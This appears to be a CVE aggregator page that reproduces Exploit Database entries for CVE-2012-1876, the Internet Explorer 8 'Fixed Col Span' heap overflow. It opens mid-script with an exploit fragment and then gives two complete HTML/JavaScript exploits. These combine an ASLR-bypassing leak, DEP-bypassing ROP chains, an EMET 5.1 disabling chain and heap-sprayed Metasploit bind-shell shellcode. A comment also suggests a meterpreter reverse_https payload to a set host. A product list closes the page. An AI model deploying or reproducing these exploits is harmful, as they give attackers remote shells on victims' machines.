shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
// Store various pointers here
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u14eb"); // NOPs
shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// Store various pointers here
// EMET disable part 0x02
// MOV EAX,DWORD PTR DS:[076D10BCH]
// MOV ESI,DWORD PTR [EAX+518H]
// SUB ESP,2CCH
// MOV DWORD PTR [ESP],10010H
// MOV EDI,ESP
// MOV ECX,2CCH
// ADD EDI,4
// SUB ECX,4
// XOR EAX,EAX
// REP STOS BYTE PTR ES:[EDI]
// PUSH ESP
// PUSH 0FFFFFFFEH
// CALL ESI
shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
"%ufe6a%ud6ff");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1245880";
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
Exploit Database EDB-ID : 35273
Publication date : 2014-11-16 23h00 +00:00
Author : ryujin & sickness
EDB Verified : Yes
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass
** Exploit Coded by sickness || EMET 5.1 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var rop = cbuttonlayout + 3621437; // MOV EAX,EDX
var rop = rop.toString(16);
var rop41 = rop.substring(4,8);
var rop42 = rop.substring(0,4); // } RET
var shellcode = unescape("%u4444");
while (shellcode.length < 100)
shellcode = shellcode + shellcode;
var shellcode = shellcode.substr(0, 46);
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01 annihilate ROP protections
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u5f3c%u07d2"); // EMET_STRING_PTR (GetModuleHandle argument)
shellcode+= unescape("%u7372%u0006"); // Offset to "decoding helper" 0x67372
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of the "decoding helper")
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u5e84%u07d2"); // Set EBP to successfully return from the "decoding helper"
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN Call the "decoding helper"
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue
shellcode+= unescape("%u"+rop41+"%u"+rop42); // MOV EAX,EDX # RETN
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI # RETN
shellcode+= unescape("%u5f38%u07d2"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on)
shellcode+= unescape("%u"+rop37+"%u"+rop38); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u01b8%u0000"); // offset to NtProtectVirtualMemory unhooked
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%uffff%uffff"); // ProcessHandle
shellcode+= unescape("%u5f38%u07d2"); // *BaseAddress
shellcode+= unescape("%u5f34%u07d2"); // NumberOfBytesToProtect
shellcode+= unescape("%u0040%u0000"); // NewAccessProtection
shellcode+= unescape("%u5f30%u07d2"); // OldAccessProtection
shellcode+= unescape("%u5f38%u07d2"); // Reget pointer
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0558%u0000"); // Offset to EMET mitigations switch
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // NULL
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBX
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
// Store various pointers here
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u18eb"); // NOPs
shellcode+= unescape("%u4242%u4242"); // OldAccessProtection
shellcode+= unescape("%u0564%u0000"); // Size for NtVirtualProtectMemory
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// Store various pointers here
// EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread
// MOV EAX,DWORD PTR DS:[076D10BCH]
// MOV EAX,DWORD PTR DS:[007D25F48H]
// MOV ESI,DWORD PTR [EAX+518H]
// SUB ESP,2CCH
// MOV DWORD PTR [ESP],10010H
// MOV EDI,ESP
// MOV ECX,2CCH
// ADD EDI,4
// SUB ECX,4
// XOR EAX,EAX
// REP STOS BYTE PTR ES:[EDI]
// PUSH ESP
// PUSH 0FFFFFFFEH
// CALL ESI
shellcode+= unescape("%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec" +
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
"%ufe6a%ud6ff");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1312272"; // 0x07D25E40
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
Exploit Database EDB-ID : 24017
Publication date : 2013-01-09 23h00 +00:00
Author : sickness
EDB Verified : Yes
<!--
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
** Author:
[email protected]
** Thanks to Ryujin, Dookie and mr_me :) for their help.
####################################################################
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php
** Tested on Windows 7 (x86) - IE 8.0.7601.17514
** Old version of the exploit available at: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24017-old.zip
####################################################################
** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)
** To get it working on a different version of Windows you will require to make your own chances to the exploit :)
** Have fun :)
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// Standard DEP bypass
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp
// You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1245880";
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
Products Mentioned
Configuraton 0
Microsoft>>Internet_explorer >> Version 6
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_server_2003 >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version -
Configuraton 0
Microsoft>>Internet_explorer >> Version 7
Microsoft>>Windows_2003_server >> Version *
